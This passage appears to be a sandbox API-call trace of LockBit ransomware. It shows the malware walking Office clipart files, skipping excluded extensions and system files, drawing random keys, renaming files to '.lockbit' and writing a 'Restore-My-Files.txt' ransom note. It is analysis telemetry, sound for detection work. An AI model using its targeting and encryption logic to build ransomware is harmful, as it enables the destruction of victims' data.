returned -1 [0147.746] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.746] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.746] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.746] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.746] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.746] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.746] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.746] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.746] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.746] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.746] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.747] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.747] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.747] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.747] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.747] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.747] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.747] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.747] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.747] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.747] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.747] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.747] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.747] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.747] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.747] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.747] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.747] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0185670.WMF") returned 1 [0147.747] lstrcmpiW (lpString1="ntldr", lpString2="J0185670.WMF") returned 1 [0147.748] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0185670.WMF") returned 1 [0147.748] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0185670.WMF") returned -1 [0147.748] lstrcmpiW (lpString1="autorun.inf", lpString2="J0185670.WMF") returned -1 [0147.748] lstrcmpiW (lpString1="thumbs.db", lpString2="J0185670.WMF") returned 1 [0147.748] lstrcmpiW (lpString1="iconcache.db", lpString2="J0185670.WMF") returned -1 [0147.748] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.748] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF") returned=".WMF" [0147.748] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.748] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.748] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.748] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.748] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.748] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.748] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.748] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.748] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.748] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.748] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.748] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.749] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.749] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.749] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.749] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.749] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.749] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.749] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.749] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.749] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.749] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.749] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.749] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.749] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.749] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.749] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.749] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.749] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF.lockbit") returned 72 [0147.749] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185670.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0147.750] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.750] malloc (_Size=0x40068) returned 0x3df0008 [0147.750] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7304) returned 1 [0147.750] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.751] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.751] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.751] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.751] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.756] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.756] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.756] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.757] free (_Block=0x1fa2ed8) [0147.757] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.757] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.758] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.758] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fbf9f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4e46, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0185774.WMF", cAlternateFileName="")) returned 1 [0147.762] lstrcmpiW (lpString1=".", lpString2="J0185774.WMF") returned -1 [0147.762] lstrcmpiW (lpString1="..", lpString2="J0185774.WMF") returned -1 [0147.762] PathFindExtensionW (pszPath="J0185774.WMF") returned=".WMF" [0147.762] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.762] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.763] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.763] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.764] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.764] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.764] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.764] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0185774.WMF") returned 1 [0147.764] lstrcmpiW (lpString1="ntldr", lpString2="J0185774.WMF") returned 1 [0147.764] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0185774.WMF") returned 1 [0147.764] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0185774.WMF") returned -1 [0147.764] lstrcmpiW (lpString1="autorun.inf", lpString2="J0185774.WMF") returned -1 [0147.764] lstrcmpiW (lpString1="thumbs.db", lpString2="J0185774.WMF") returned 1 [0147.764] lstrcmpiW (lpString1="iconcache.db", lpString2="J0185774.WMF") returned -1 [0147.764] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.764] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF") returned=".WMF" [0147.764] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.764] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.764] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.764] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.764] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.764] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.764] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.764] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.764] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.764] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.764] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.764] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.765] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.765] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.765] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.765] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.765] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.765] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.765] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.765] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.765] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.765] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.765] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.765] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.765] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.765] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.765] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.765] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.765] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF.lockbit") returned 72 [0147.765] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185774.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.768] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.768] malloc (_Size=0x40068) returned 0x1ff1e60 [0147.768] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=20038) returned 1 [0147.768] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.769] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0147.769] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.770] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0147.770] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.775] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.775] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.775] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.777] free (_Block=0x1fa2ed8) [0147.777] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.777] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.777] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.777] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564c4a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x69d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0185776.WMF", cAlternateFileName="")) returned 1 [0147.777] lstrcmpiW (lpString1=".", lpString2="J0185776.WMF") returned -1 [0147.777] lstrcmpiW (lpString1="..", lpString2="J0185776.WMF") returned -1 [0147.777] PathFindExtensionW (pszPath="J0185776.WMF") returned=".WMF" [0147.777] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.777] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.777] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.777] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.777] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.777] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.777] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.778] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.778] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.779] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0185776.WMF") returned 1 [0147.779] lstrcmpiW (lpString1="ntldr", lpString2="J0185776.WMF") returned 1 [0147.779] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0185776.WMF") returned 1 [0147.780] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0185776.WMF") returned -1 [0147.780] lstrcmpiW (lpString1="autorun.inf", lpString2="J0185776.WMF") returned -1 [0147.780] lstrcmpiW (lpString1="thumbs.db", lpString2="J0185776.WMF") returned 1 [0147.780] lstrcmpiW (lpString1="iconcache.db", lpString2="J0185776.WMF") returned -1 [0147.780] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.780] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF") returned=".WMF" [0147.780] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.780] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.780] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.780] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.780] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.780] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.780] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.780] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.780] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.780] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.780] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.780] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.780] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.780] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.780] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.781] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.781] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.781] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.781] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.781] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.781] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.781] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.781] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.781] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.781] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.781] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.781] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.781] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.781] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF.lockbit") returned 72 [0147.781] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185776.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0147.782] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.782] malloc (_Size=0x40068) returned 0x3d70450 [0147.782] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=27096) returned 1 [0147.782] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.783] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0147.783] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.783] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0147.783] ReadFile (in: 